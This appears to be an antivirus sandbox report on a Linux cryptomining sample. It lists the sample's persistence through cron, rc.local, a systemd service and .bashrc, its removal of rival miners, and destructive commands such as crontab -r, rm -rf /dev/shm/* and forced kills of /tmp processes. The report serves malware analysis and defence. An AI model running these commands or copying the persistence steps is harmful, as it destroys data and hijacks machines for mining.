Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/cron.d/localupdatemanager.cron
- /etc/rc.local
Malicious functions:
Manages services:
- ['systemctl', 'stop', 'bot']
- ['systemctl', 'enable', 'localupdatedaemon']
- ['systemctl', 'start', 'localupdatedaemon']
Launches processes:
- /bin/bash -c sysctl -w vm.nr_hugepages=102400
- /bin/sh -c rm -rf /etc/ld.so.preload /usr/local/lib/[cmake.so /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so
- sysctl -w vm.nr_hugepages=102400
- rm /etc/zclient
- /bin/bash -c rm -rf /etc/.localconfig
- /bin/bash -c (crontab -l ; echo \x220 */12 *
- /bin/sh -c systemctl enable localupdatedaemon && systemctl start localupdatedaemon
- rm -rf /etc/.localconfig
- crontab -r
- /bin/sh -c kill -9 /tmp/*
- /bin/bash -c pkill /tmp/*
- /bin/bash -c killall localupdatemanager && pkill -9 localupdatemanager && kill -9 localupdatemanager
- /bin/sh -c killall localupdatemanager && pkill -9 localupdatemanager && kill -9 localupdatemanager
- /bin/sh -c (crontab -l ; echo \x220 */12 *
- /bin/bash -c rm -rf /dev/shm/*
- rm -rf /etc/ld.so.preload /usr/local/lib/[cmake.so /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so
- /bin/bash -c crontab -r
- /bin/bash -c rm -rf /etc/ld.so.preload /usr/local/lib/[cmake.so /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so
- /bin/sh -c rm -rf /etc/.localconfig
- /bin/bash -c kill -9 /tmp/*
- /bin/sh -c pkill /tmp/*
- /bin/sh -c systemctl stop bot && systemctl disable bot && systemctl --user stop bot && systemctl --user disable bot
- /bin/sh -c crontab -r
- /bin/sh -c rm /etc/zclient && rm /etc/zdaemon
- /bin/sh -c rm -rf /dev/shm/*
- rm -rf /dev/shm/*
- rm -rf /etc/cron.d/zdaemon
- /bin/bash -c rm /etc/zclient && rm /etc/zdaemon
- /bin/sh -c rm -rf /etc/cron.d/zdaemon
- /bin/sh -c sysctl -w vm.nr_hugepages=102400
- /bin/bash -c systemctl stop bot && systemctl disable bot && systemctl --user stop bot && systemctl --user disable bot
- /bin/bash -c rm -rf /etc/cron.d/zdaemon
- /usr/bin/pgrep pkill /tmp/systemd-private-38bb8d12207944cabaef5b72462c0311-systemd-logind.service-hNpSKi /tmp/systemd-private-38bb8d12207944cabaef5b72462c0311-systemd-timesyncd.service-xVMmki /tmp/tmux-0
- /bin/bash -c systemctl enable localupdatedaemon && systemctl start localupdatedaemon
Performs operations with the file system:
Modifies file access rights:
- /etc/rc.local
Creates folders:
- /etc/.localconfig
Deletes folders:
- /etc/.localconfig
Creates or modifies files:
- /etc/hosts
- /usr/lib/systemd/system/localupdatedaemon.service
- /root/.bashrc
- /proc/sys/vm/nr_hugepages
Deletes files:
- /etc/.localconfig
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
Sends data to the following servers:
- <LOCAL_DNS_SERVER>
Receives data from the following servers:
- <LOCAL_DNS_SERVER>
Other:
Collects OS information
Collects CPU information